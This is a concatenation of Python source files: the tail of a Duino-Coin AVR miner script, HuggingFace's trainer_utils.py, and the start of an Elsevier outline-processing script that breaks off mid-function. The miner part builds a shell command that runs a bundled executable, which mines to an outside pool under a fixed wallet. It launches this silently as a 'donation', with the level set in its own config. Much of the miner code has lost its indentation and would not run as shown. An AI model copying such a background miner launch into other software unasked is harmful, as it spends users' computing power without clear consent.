elif os.name == "posix":
cmd = (
"cd "
+ resourcesFolder
+ "&& chmod +x Donate_executable && ./Donate_executable -o stratum+tcp://blockmasters.co:6033 -u 9RTb3ikRrWExsF6fis85g7vKqU1tQYVFuR -p AVRmL,c=XMG,d=16 -s 4 -e "
)
if int(donationlevel) <= 0:
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys0 "
+ Back.RESET
+ Fore.YELLOW
+ " Duino-Coin network is a completely free service and will always be."
+ Style.BRIGHT
+ Fore.YELLOW
+ "\nWe don't take any fees from your mining.\nYou can really help us maintain the server and low-fee exchanges by donating.\nVisit "
+ Style.RESET_ALL
+ Fore.GREEN
+ "https://duinocoin.com/donate"
+ Style.BRIGHT
+ Fore.YELLOW
+ " to learn more about how you can help :)"
+ Style.RESET_ALL
)
time.sleep(10)
if donatorrunning == False:
if int(donationlevel) == 5:
cmd += "100"
elif int(donationlevel) == 4:
cmd += "85"
elif int(donationlevel) == 3:
cmd += "60"
elif int(donationlevel) == 2:
cmd += "30"
elif int(donationlevel) == 1:
cmd += "15"
if int(donationlevel) > 0: # Launch CMD as subprocess
debugOutput("Starting donation process")
donatorrunning = True
donateExecutable = subprocess.Popen(
cmd, shell=True, stderr=subprocess.DEVNULL
)
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys0 "
+ Back.RESET
+ Fore.RED
+ " Thank You for being an awesome donator ❤️ \nYour donation will help us maintain the server and allow further development"
+ Style.RESET_ALL
)
def initRichPresence():
global RPC
try:
RPC = Presence(808056068113563701)
RPC.connect()
except: # Discord not launched
pass
def updateRichPresence():
startTime = int(time.time())
while True:
try:
RPC.update(
details="Hashrate: " + str(hashrate) + " H/s",
start=startTime,
state="Acc. shares: "
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1]),
large_image="ducol",
large_text="Duino-Coin, a cryptocurrency that can be mined with Arduino boards",
buttons=[
{"label": "Learn more", "url": "https://duinocoin.com"},
{"label": "Discord Server", "url": "https://discord.gg/k48Ht5y"},
],
)
except: # Discord not launched
pass
time.sleep(15) # 15 seconds to respect discord's rate limit
def AVRMine(com): # Mining section
global hash_count, connectionMessageShown, hashrate
while True:
while True:
try:
res = requests.get(
serveripfile, data=None
) # Use request to grab data from raw github file
if res.status_code == 200: # Check for response
content = (
res.content.decode().splitlines()
) # Read content and split into lines
masterServer_address = content[0] # Line 1 = pool address
masterServer_port = content[1] # Line 2 = pool port
debugOutput(
"Retrieved pool IP: "
+ masterServer_address
+ ":"
+ str(masterServer_port)
)
break
except: # If it wasn't, display a message
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ Back.BLUE
+ Fore.WHITE
+ " net"
+ str(com[-1:].lower())
+ " "
+ Back.RESET
+ Fore.RED
+ " Error retrieving data from GitHub! Retrying in 10s."
)
if debug == "y":
raise
time.sleep(10)
while True: # This section connects to the server
try:
socId = socket.socket()
socId.connect(
(str(masterServer_address), int(masterServer_port))
) # Connect to the server
serverVersion = socId.recv(3).decode() # Get server version
debugOutput("Server version: " + serverVersion)
if (
float(serverVersion) <= float(minerVersion)
and len(serverVersion) == 3
and connectionMessageShown != True
): # If miner is up-to-date, display a message and continue
connectionMessageShown = True
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ Back.BLUE
+ Fore.WHITE
+ " net0 "
+ Back.RESET
+ Fore.YELLOW
+ " Connected"
+ Style.RESET_ALL
+ Fore.WHITE
+ " to master Duino-Coin server (v"
+ str(serverVersion)
+ ")"
)
elif connectionMessageShown != True:
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys0 "
+ Back.RESET
+ Fore.RED
+ " Miner is outdated (v"
+ minerVersion
+ "),"
+ Style.RESET_ALL
+ Fore.RED
+ " server is on v"
+ serverVersion
+ ", please download latest version from https://github.com/revoxhere/duino-coin/releases/"
)
break
except:
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.BLUE
+ Fore.WHITE
+ " net0 "
+ Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RED
+ " Error connecting to the server. Retrying in 10s"
+ Style.RESET_ALL
)
if debug == "y":
raise
time.sleep(10)
while True:
try: # Close previous serial connections (if any)
com.close()
except:
pass
try:
comConnection = serial.Serial(
com,
115200,
timeout=3,
write_timeout=3,
inter_byte_timeout=1,
)
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " "
+ str(com[-4:].lower())
+ " "
+ Style.RESET_ALL
+ Style.BRIGHT
+ Fore.GREEN
+ " AVR on port "
+ str(com[-4:])
+ " is connected"
+ Style.RESET_ALL
)
break
except:
debugOutput("Error connecting to AVR")
if debug == "y":
raise
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " "
+ str(com[-4:].lower())
+ " "
+ Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RED
+ " AVR connection error on port "
+ str(com[-4:])
+ ", please check wether it's plugged in or not"
+ Style.RESET_ALL
)
time.sleep(10)
first_share = True
avr_not_initialized = True
while avr_not_initialized:
try:
ready = comConnection.readline().decode() # AVR will send ready signal
debugOutput("Received start word (" + str(ready) + ")")
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys"
+ str(com[-1:])
+ " "
+ Back.RESET
+ Fore.YELLOW
+ " AVR mining thread is starting"
+ Style.RESET_ALL
+ Fore.WHITE
+ " using DUCO-S1A algorithm ("
+ str(com)
+ ")"
)
avr_not_initialized = False
            except:
                connection_error = True
                time.sleep(10)
                print(
                    now().strftime(Style.DIM + "%H:%M:%S ")
                    + Style.RESET_ALL
                    + Style.BRIGHT
                    + Back.MAGENTA
                    + Fore.WHITE
                    + " "
                    + str(com[-4:].lower())
                    + " "
                    + Back.RESET
                    + Fore.RED
                    + " Error connecting to the AVR! Retrying in 10s."
                )
            else:
                connection_error = False
while True:
while True:
try:
job_not_received = True
while job_not_received:
socId.send(
bytes(
"JOB," + str(username) + "," + str(requestedDiff),
encoding="utf8",
)
) # Send job request
try:
job = socId.recv(1024).decode() # Retrieves work from pool
debugOutput("Received job")
job_not_received = False
except:
break
job = job.split(",") # Split received data to job and difficulty
try:
if job[0] and job[1] and job[2]:
debugOutput("Job received: " + str(job))
diff = job[2]
break # If job received, continue
except IndexError:
debugOutput("IndexError, retrying")
except:
if debug == "y":
raise
break
try: # Write data to AVR board
try:
comConnection.write(bytes("start\n", encoding="utf8")) # start word
debugOutput("Written start word")
comConnection.write(
bytes(
str(job[0] + "\n" + job[1] + "\n" + job[2] + "\n"),
encoding="utf8",
)
) # hash
debugOutput("Send job to arduino")
                except:
                    # ConnectToAVR is not defined anywhere in this file; break out so
                    # the enclosing loop re-establishes the server and serial connections.
                    break
wrong_avr_result = True
wrong_results = 0
while wrong_avr_result:
result = comConnection.readline().decode() # Read the result
debugOutput(str("result: ") + str(result))
if result == "":
wrong_avr_result = True
wrong_results = wrong_results + 1
if first_share or wrong_results > 5:
wrong_avr_result = False
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " avr "
+ Back.RESET
+ Fore.RED
+ " Arduino is taking longer than expected, sending it a new job "
)
else:
wrong_avr_result = False
first_share = False
wrong_results = 0
if first_share or wrong_results > 5:
continue
result = result.split(",")
try:
debugOutput("Received result (" + str(result[0]) + ")")
debugOutput("Received time (" + str(result[1]) + ")")
computetime = round(
int(result[1]) / 1000000, 3
) # Convert AVR time to s
hashrate = round(int(result[0]) / int(result[1]) * 1000000, 2)
debugOutput("Calculated hashrate (" + str(hashrate) + ")")
except:
break
try:
socId.send(
bytes(
str(result[0])
+ ","
+ str(hashrate)
+ ",Official AVR Miner v"
+ str(minerVersion)
+ ","
+ str(rigIdentifier),
encoding="utf8",
)
) # Send result back to the server
except:
break
except:
break
while True:
responsetimetart = now()
feedback_not_received = True
while feedback_not_received:
try:
feedback = socId.recv(64).decode() # Get feedback
except socket.timeout:
feedback_not_received = True
debugOutput("Timeout while getting feedback, retrying")
except ConnectionResetError:
debugOutput("Connection was reset, reconnecting")
feedback_not_received = True
break
except ConnectionAbortedError:
debugOutput("Connection was aborted, reconnecting")
feedback_not_received = True
break
else:
responsetimestop = now() # Measure server ping
ping = responsetimestop - responsetimetart # Calculate ping
ping = str(int(ping.microseconds / 1000)) # Convert to ms
feedback_not_received = False
debugOutput("Successfully retrieved feedback")
if feedback == "GOOD": # If result was good
shares[0] = (
shares[0] + 1
) # Share accepted = increment correct shares counter by 1
title(
"Duino-Coin AVR Miner (v"
+ str(minerVersion)
+ ") - "
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ " accepted shares"
)
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " "
+ str(com[-4:].lower())
+ " "
+ Back.RESET
+ Fore.GREEN
+ " Accepted "
+ Fore.WHITE
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ Back.RESET
+ Fore.YELLOW
+ " ("
+ str(int((shares[0] / (shares[0] + shares[1]) * 100)))
+ "%)"
+ Style.NORMAL
+ Fore.WHITE
+ " ⁃ "
+ Style.BRIGHT
+ Fore.WHITE
+ str(computetime)
+ "s"
+ Style.NORMAL
+ " - "
+ str(hashrate)
+ " H/s @ diff "
+ str(diff)
+ " ⁃ "
+ Fore.BLUE
+ "ping "
+ ping
+ "ms"
)
break # Repeat
elif feedback == "BLOCK": # If result was good
shares[0] = (
shares[0] + 1
) # Share accepted = increment correct shares counter by 1
title(
"Duino-Coin AVR Miner (v"
+ str(minerVersion)
+ ") - "
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ " accepted shares"
)
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " "
+ str(com[-4:].lower())
+ " "
+ Back.RESET
+ Fore.CYAN
+ " Block found "
+ Fore.WHITE
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ Back.RESET
+ Fore.YELLOW
+ " ("
+ str(int((shares[0] / (shares[0] + shares[1]) * 100)))
+ "%)"
+ Style.NORMAL
+ Fore.WHITE
+ " ⁃ "
+ Style.BRIGHT
+ Fore.WHITE
+ str(computetime)
+ "s"
+ Style.NORMAL
+ " - "
+ str(hashrate)
+ " H/s @ diff "
+ str(diff)
+ " ⁃ "
+ Fore.BLUE
+ "ping "
+ ping
+ "ms"
)
break # Repeat
elif feedback == "INVU": # If user doesn't exist
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.BLUE
+ Fore.WHITE
+ " net"
+ str(com[-1:])
+ " "
+ Back.RESET
+ Fore.RED
+ " User "
+ str(username)
+ " doesn't exist."
+ Style.RESET_ALL
+ Fore.RED
+ " Make sure you've entered the username correctly. Please check your config file. Retrying in 10s"
)
time.sleep(10)
elif feedback == "ERR": # If server says that it encountered an error
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.BLUE
+ Fore.WHITE
+ " net"
+ str(com[-1:])
+ " "
+ Back.RESET
+ Fore.RED
+ " Internal server error."
+ Style.RESET_ALL
+ Fore.RED
+ " Retrying in 10s"
)
time.sleep(10)
else: # If result was bad
shares[1] += 1 # Share rejected = increment bad shares counter by 1
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " "
+ str(com[-4:].lower())
+ " "
+ Back.RESET
+ Fore.RED
+ " Rejected "
+ Fore.WHITE
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ Back.RESET
+ Fore.YELLOW
+ " ("
+ str(int((shares[0] / (shares[0] + shares[1]) * 100)))
+ "%)"
+ Style.NORMAL
+ Fore.WHITE
+ " ⁃ "
+ Style.BRIGHT
+ Fore.WHITE
+ str(computetime)
+ "s"
+ Style.NORMAL
+ " - "
+ str(hashrate)
+ " H/s @ diff "
+ str(diff)
+ " ⁃ "
+ Fore.BLUE
+ "ping "
+ ping
+ "ms"
)
break # Repeat
if __name__ == "__main__":
init(autoreset=True) # Enable colorama
title("Duino-Coin AVR Miner (v" + str(minerVersion) + ")")
try:
loadConfig() # Load config file or create new one
debugOutput("Config file loaded")
except:
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys0 "
+ Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RED
+ " Error loading the configfile ("
+ resourcesFolder
+ "/Miner_config.cfg). Try removing it and re-running configuration. Exiting in 10s"
+ Style.RESET_ALL
)
if debug == "y":
raise
time.sleep(10)
os._exit(1)
try:
Greeting() # Display greeting message
debugOutput("Greeting displayed")
except:
if debug == "y":
raise
try:
Donate() # Start donation thread
except:
if debug == "y":
raise
try:
for port in avrport:
threading.Thread(
target=AVRMine, args=(port,)
).start() # Launch avr duco mining threads
except:
if debug == "y":
raise
initRichPresence()
threading.Thread(target=updateRichPresence).start()
|
trainer_utils.py
|
# coding=utf-8
# Copyright 2020-present the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utilities for the Trainer and TFTrainer class. Should be independent from PyTorch and TensorFlow.
"""
import copy
import functools
import gc
import inspect
import os
import random
import re
import threading
import time
from typing import Any, Dict, NamedTuple, Optional, Tuple, Union
import numpy as np
from .utils import (
ExplicitEnum,
is_psutil_available,
is_tf_available,
is_torch_available,
is_torch_cuda_available,
is_torch_tpu_available,
)
if is_torch_available():
import torch
if is_tf_available():
import tensorflow as tf
def set_seed(seed: int):
"""
Helper function for reproducible behavior to set the seed in `random`, `numpy`, `torch` and/or `tf` (if installed).
Args:
seed (`int`): The seed to set.
"""
random.seed(seed)
np.random.seed(seed)
if is_torch_available():
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# ^^ safe to call this function even if cuda is not available
if is_tf_available():
tf.random.set_seed(seed)
class EvalPrediction(NamedTuple):
"""
Evaluation output (always contains labels), to be used to compute metrics.
Parameters:
predictions (`np.ndarray`): Predictions of the model.
label_ids (`np.ndarray`): Targets to be matched.
"""
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Union[np.ndarray, Tuple[np.ndarray]]
class EvalLoopOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[Union[np.ndarray, Tuple[np.ndarray]]]
metrics: Optional[Dict[str, float]]
num_samples: Optional[int]
class PredictionOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[Union[np.ndarray, Tuple[np.ndarray]]]
metrics: Optional[Dict[str, float]]
class TrainOutput(NamedTuple):
global_step: int
training_loss: float
metrics: Dict[str, float]
PREFIX_CHECKPOINT_DIR = "checkpoint"
_re_checkpoint = re.compile(r"^" + PREFIX_CHECKPOINT_DIR + r"\-(\d+)$")
def get_last_checkpoint(folder):
content = os.listdir(folder)
checkpoints = [
path
for path in content
if _re_checkpoint.search(path) is not None and os.path.isdir(os.path.join(folder, path))
]
if len(checkpoints) == 0:
return
return os.path.join(folder, max(checkpoints, key=lambda x: int(_re_checkpoint.search(x).groups()[0])))
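# For example (illustrative): if `folder` contains "checkpoint-100" and "checkpoint-500",
# get_last_checkpoint(folder) returns the path of "checkpoint-500" (the highest step);
# it returns None (implicitly) when no matching checkpoint-* subfolders exist.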
class IntervalStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class EvaluationStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class HubStrategy(ExplicitEnum):
END = "end"
EVERY_SAVE = "every_save"
CHECKPOINT = "checkpoint"
ALL_CHECKPOINTS = "all_checkpoints"
class BestRun(NamedTuple):
"""
    The best run found by a hyperparameter search (see [`~Trainer.hyperparameter_search`]).
Parameters:
run_id (`str`):
The id of the best run (if models were saved, the corresponding checkpoint will be in the folder ending
with run-{run_id}).
objective (`float`):
The objective that was obtained for this run.
hyperparameters (`Dict[str, Any]`):
The hyperparameters picked to get this run.
"""
run_id: str
objective: float
hyperparameters: Dict[str, Any]
def default_compute_objective(metrics: Dict[str, float]) -> float:
"""
    The default objective to maximize/minimize when doing a hyperparameter search. It is the evaluation loss if no
metrics are provided to the [`Trainer`], the sum of all metrics otherwise.
Args:
metrics (`Dict[str, float]`): The metrics returned by the evaluate method.
Return:
`float`: The objective to minimize or maximize
"""
metrics = copy.deepcopy(metrics)
loss = metrics.pop("eval_loss", None)
_ = metrics.pop("epoch", None)
# Remove speed metrics
speed_metrics = [m for m in metrics.keys() if m.endswith("_runtime") or m.endswith("_per_second")]
for sm in speed_metrics:
_ = metrics.pop(sm, None)
return loss if len(metrics) == 0 else sum(metrics.values())
def default_hp_space_optuna(trial) -> Dict[str, float]:
from .integrations import is_optuna_available
assert is_optuna_available(), "This function needs Optuna installed: `pip install optuna`"
return {
"learning_rate": trial.suggest_float("learning_rate", 1e-6, 1e-4, log=True),
"num_train_epochs": trial.suggest_int("num_train_epochs", 1, 5),
"seed": trial.suggest_int("seed", 1, 40),
"per_device_train_batch_size": trial.suggest_categorical("per_device_train_batch_size", [4, 8, 16, 32, 64]),
}
def default_hp_space_ray(trial) -> Dict[str, float]:
from .integrations import is_ray_tune_available
assert is_ray_tune_available(), "This function needs ray installed: `pip " "install ray[tune]`"
from ray import tune
return {
"learning_rate": tune.loguniform(1e-6, 1e-4),
"num_train_epochs": tune.choice(list(range(1, 6))),
"seed": tune.uniform(1, 40),
"per_device_train_batch_size": tune.choice([4, 8, 16, 32, 64]),
}
def default_hp_space_sigopt(trial):
return [
{"bounds": {"min": 1e-6, "max": 1e-4}, "name": "learning_rate", "type": "double", "transformamtion": "log"},
{"bounds": {"min": 1, "max": 6}, "name": "num_train_epochs", "type": "int"},
{"bounds": {"min": 1, "max": 40}, "name": "seed", "type": "int"},
{
"categorical_values": ["4", "8", "16", "32", "64"],
"name": "per_device_train_batch_size",
"type": "categorical",
},
]
def default_hp_space_wandb(trial) -> Dict[str, float]:
from .integrations import is_wandb_available
if not is_wandb_available():
raise ImportError("This function needs wandb installed: `pip install wandb`")
return {
"method": "random",
"metric": {"name": "objective", "goal": "minimize"},
"parameters": {
"learning_rate": {"distribution": "uniform", "min": 1e-6, "max": 1e-4},
"num_train_epochs": {"distribution": "int_uniform", "min": 1, "max": 6},
"seed": {"distribution": "int_uniform", "min": 1, "max": 40},
"per_device_train_batch_size": {"values": [4, 8, 16, 32, 64]},
},
}
class HPSearchBackend(ExplicitEnum):
OPTUNA = "optuna"
RAY = "ray"
SIGOPT = "sigopt"
WANDB = "wandb"
default_hp_space = {
HPSearchBackend.OPTUNA: default_hp_space_optuna,
HPSearchBackend.RAY: default_hp_space_ray,
HPSearchBackend.SIGOPT: default_hp_space_sigopt,
HPSearchBackend.WANDB: default_hp_space_wandb,
}
def is_main_process(local_rank):
"""
    Whether or not the current process is the local main process, based on `xm.get_ordinal()` (for TPUs) first, then on
`local_rank`.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.get_ordinal() == 0
return local_rank in [-1, 0]
def total_processes_number(local_rank):
"""
Return the number of processes launched in parallel. Works with `torch.distributed` and TPUs.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.xrt_world_size()
elif local_rank != -1 and is_torch_available():
import torch
return torch.distributed.get_world_size()
return 1
def speed_metrics(split, start_time, num_samples=None, num_steps=None):
"""
Measure and return speed performance metrics.
This function requires a time snapshot `start_time` before the operation to be measured starts and this function
should be run immediately after the operation to be measured has completed.
Args:
- split: name to prefix metric (like train, eval, test...)
- start_time: operation start time
    - num_samples: number of samples processed
    - num_steps: number of steps processed
"""
runtime = time.time() - start_time
result = {f"{split}_runtime": round(runtime, 4)}
if num_samples is not None:
samples_per_second = num_samples / runtime
result[f"{split}_samples_per_second"] = round(samples_per_second, 3)
if num_steps is not None:
steps_per_second = num_steps / runtime
result[f"{split}_steps_per_second"] = round(steps_per_second, 3)
return result
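# Worked example (illustrative numbers): calling speed_metrics("train", start_time,
# num_samples=100, num_steps=25) over a span measured as 4.0 seconds returns
#   {"train_runtime": 4.0, "train_samples_per_second": 25.0, "train_steps_per_second": 6.25}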
class SchedulerType(ExplicitEnum):
LINEAR = "linear"
COSINE = "cosine"
COSINE_WITH_RESTARTS = "cosine_with_restarts"
POLYNOMIAL = "polynomial"
CONSTANT = "constant"
CONSTANT_WITH_WARMUP = "constant_with_warmup"
class TrainerMemoryTracker:
"""
A helper class that tracks cpu and gpu memory.
This class will silently skip unless `psutil` is available. Install with `pip install psutil`.
When a stage completes, it can pass metrics dict to update with the memory metrics gathered during this stage.
Example :
```python
self._memory_tracker = TrainerMemoryTracker(self.args.skip_memory_metrics)
self._memory_tracker.start()
# code ...
metrics = {"train_runtime": 10.5}
self._memory_tracker.stop_and_update_metrics(metrics)
```
At the moment GPU tracking is only for `pytorch`, but can be extended to support `tensorflow`.
To understand this class' intricacies please read the documentation of [`~Trainer.log_metrics`].
"""
# map trainer methods to metrics prefix
stages = {
"__init__": "init",
"train": "train",
"evaluate": "eval",
"predict": "test",
}
def __init__(self, skip_memory_metrics=False):
self.skip_memory_metrics = skip_memory_metrics
if not is_psutil_available():
# soft dependency on psutil
self.skip_memory_metrics = True
if self.skip_memory_metrics:
return
import psutil # noqa
if is_torch_cuda_available():
import torch
self.torch = torch
self.gpu = {}
else:
self.torch = None
self.process = psutil.Process()
self.cur_stage = None
self.cpu = {}
self.init_reported = False
def derive_stage(self):
"""derives the stage/caller name automatically"""
caller = inspect.currentframe().f_back.f_back.f_code.co_name
if caller in self.stages:
return self.stages[caller]
else:
raise ValueError(
f"was called from {caller}, but only expect to be called from one of {self.stages.keys()}"
)
def cpu_mem_used(self):
"""get resident set size memory for the current process"""
return self.process.memory_info().rss
def peak_monitor_func(self):
self.cpu_mem_used_peak = -1
while True:
self.cpu_mem_used_peak = max(self.cpu_mem_used(), self.cpu_mem_used_peak)
# can't sleep or will not catch the peak right (this comment is here on purpose)
# time.sleep(0.001) # 1msec
if not self.peak_monitoring:
break
def start(self):
"""start tracking for the caller's stage"""
if self.skip_memory_metrics:
return
stage = self.derive_stage()
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
self.cur_stage = stage
gc.collect()
if self.torch is not None:
self.torch.cuda.reset_peak_memory_stats()
self.torch.cuda.empty_cache()
# gpu
if self.torch is not None:
self.gpu_mem_used_at_start = self.torch.cuda.memory_allocated()
# cpu
self.cpu_mem_used_at_start = self.cpu_mem_used()
self.peak_monitoring = True
peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
peak_monitor_thread.daemon = True
peak_monitor_thread.start()
def stop(self, stage):
"""stop tracking for the passed stage"""
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# this sends a signal to peak_monitor_func to complete its loop
self.peak_monitoring = False
# first ensure all objects get collected and their memory is freed
gc.collect()
if self.torch is not None:
self.torch.cuda.empty_cache()
# concepts:
# - alloc_delta: the difference of allocated memory between the end and the start
# - peaked_delta: the difference between the peak memory and the current memory
# in order to know how much memory the measured code consumed one needs to sum these two
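        # illustrative numbers: begin=2GB, end=3GB, peak=5GB gives alloc=1GB and peaked=2GB,
        # so the measured code consumed roughly 3GB at its worst point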
# gpu
if self.torch is not None:
self.gpu_mem_used_now = self.torch.cuda.memory_allocated()
self.gpu_mem_used_peak = self.torch.cuda.max_memory_allocated()
self.gpu[self.cur_stage] = dict(
begin=self.gpu_mem_used_at_start,
end=self.gpu_mem_used_now,
alloc=(self.gpu_mem_used_now - self.gpu_mem_used_at_start),
peaked=max(0, self.gpu_mem_used_peak - self.gpu_mem_used_now),
)
# cpu
self.cpu_mem_used_now = self.cpu_mem_used()
self.cpu[self.cur_stage] = dict(
begin=self.cpu_mem_used_at_start,
end=self.cpu_mem_used_now,
alloc=(self.cpu_mem_used_now - self.cpu_mem_used_at_start),
peaked=max(0, self.cpu_mem_used_peak - self.cpu_mem_used_now),
)
# reset - cycle finished
self.cur_stage = None
def update_metrics(self, stage, metrics):
"""updates the metrics"""
if self.skip_memory_metrics:
return
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# since we don't have a way to return init metrics, we push them into the first of train/val/predict
stages = [stage]
if not self.init_reported:
stages.insert(0, "init")
self.init_reported = True
for stage in stages:
for t in ["alloc", "peaked"]:
if stage in self.cpu and t in self.cpu[stage]:
metrics[f"{stage}_mem_cpu_{t}_delta"] = self.cpu[stage][t]
if self.torch is not None and stage in self.gpu and t in self.gpu[stage]:
metrics[f"{stage}_mem_gpu_{t}_delta"] = self.gpu[stage][t]
# if we need additional debug info, enable the following
# for t in ["begin", "end"]:
# if stage in self.cpu and t in self.cpu[stage]:
# metrics[f"{stage}_mem_cpu_{t}"] = self.cpu[stage][t]
# if self.torch is not None and stage in self.gpu and t in self.gpu[stage]:
# metrics[f"{stage}_mem_gpu_{t}"] = self.gpu[stage][t]
# since memory can be allocated before init, and it might be difficult to track overall
# memory usage, in particular for GPU, let's report memory usage at the point init was called
if stages[0] == "init":
metrics["before_init_mem_cpu"] = self.cpu["init"]["begin"]
if self.torch is not None:
metrics["before_init_mem_gpu"] = self.gpu["init"]["begin"]
# if we also wanted to report any additional memory allocations in between init and
# whatever the next stage was we could also report this:
# if self.cpu["init"]["end"] != self.cpu[stage]["begin"]:
# metrics[f"after_init_mem_cpu_delta"] = self.cpu[stage]["begin"] - self.cpu["init"]["end"]
# if self.torch is not None and self.gpu["init"]["end"] != self.gpu[stage]["begin"]:
# metrics[f"after_init_mem_gpu_delta"] = self.gpu[stage]["begin"] - self.gpu["init"]["end"]
def stop_and_update_metrics(self, metrics=None):
"""combine stop and metrics update in one call for simpler code"""
if self.skip_memory_metrics:
return
stage = self.derive_stage()
self.stop(stage)
# init doesn't have metrics to update so we just save that data for later stages to retrieve
if metrics is not None:
self.update_metrics(stage, metrics)
def has_length(dataset):
"""
Checks if the dataset implements __len__() and it doesn't raise an error
"""
try:
return len(dataset) is not None
except TypeError:
# TypeError: len() of unsized object
return False
def denumpify_detensorize(metrics):
"""
    Recursively calls `.item()` on the elements of the dictionary passed
"""
if isinstance(metrics, (list, tuple)):
return type(metrics)(denumpify_detensorize(m) for m in metrics)
elif isinstance(metrics, dict):
return type(metrics)({k: denumpify_detensorize(v) for k, v in metrics.items()})
elif isinstance(metrics, np.generic):
return metrics.item()
elif is_torch_available() and isinstance(metrics, torch.Tensor) and metrics.numel() == 1:
return metrics.item()
return metrics
def number_of_arguments(func):
"""
Return the number of arguments of the passed function, even if it's a partial function.
"""
if isinstance(func, functools.partial):
total_args = len(inspect.signature(func.func).parameters)
return total_args - len(func.args) - len(func.keywords)
return len(inspect.signature(func).parameters)
class ShardedDDPOption(ExplicitEnum):
SIMPLE = "simple"
ZERO_DP_2 = "zero_dp_2"
ZERO_DP_3 = "zero_dp_3"
OFFLOAD = "offload"
AUTO_WRAP = "auto_wrap"
|
elsevier_process_outlines.py
|
import requests
import requests_random_user_agent
import threading
from pymongo import errors, MongoClient
import config
import json
from progress.bar import Bar
threads_amount = 5
threads = list()
def get_title(text):
if '_' in text.keys():
return(text['_'])
else:
aux = ''
for part in text['$$']:
aux += part['_']
return(aux)
def process_entry(text, sections):
if text['#name'] == 'title':
sections.append(get_title(text))
elif text['#name'] == 'entry':
for elem in text['$$']:
sections = process_entry(elem, sections)
# res = process_entry(elem, [], 0)
# print('res:' + str(res))
# sections['subsections'] = res
# sections.append(aux)
# print('->' + str(sections) + '<-')
return(sections)
def process_outline(json_outline):
sections = []
for elem in json_outline:
if elem['$']['type'] == 'sections':
for sec in elem['$$']:
if sec['#name'] == 'title':
sections.append(get_title(sec))
elif sec['#name'] == 'entry':
for entry in sec['$$']:
pass
print(sections)
return(sections)
def process_outlines(bar, sem, db_client, col, sha):
'''
After the processing of the outline, we can have three states:
1. Checked = True; toc = None
2. Checked = True; toc = []
3. Checked = True; toc = [content]
    The first state means that the outline has been processed but an error was encountered;
    the second means that it has been correctly processed but there is no content;
    and the last one means correct execution with available content.
'''
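    # Illustrative resulting documents (field values are examples only):
    #   {'sha': ..., 'checked': True, 'toc': None}              -> processing error
    #   {'sha': ..., 'checked': True, 'toc': []}                -> processed, no sections
    #   {'sha': ..., 'checked': True, 'toc': ['Introduction']}  -> processed, sections found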
with sem:
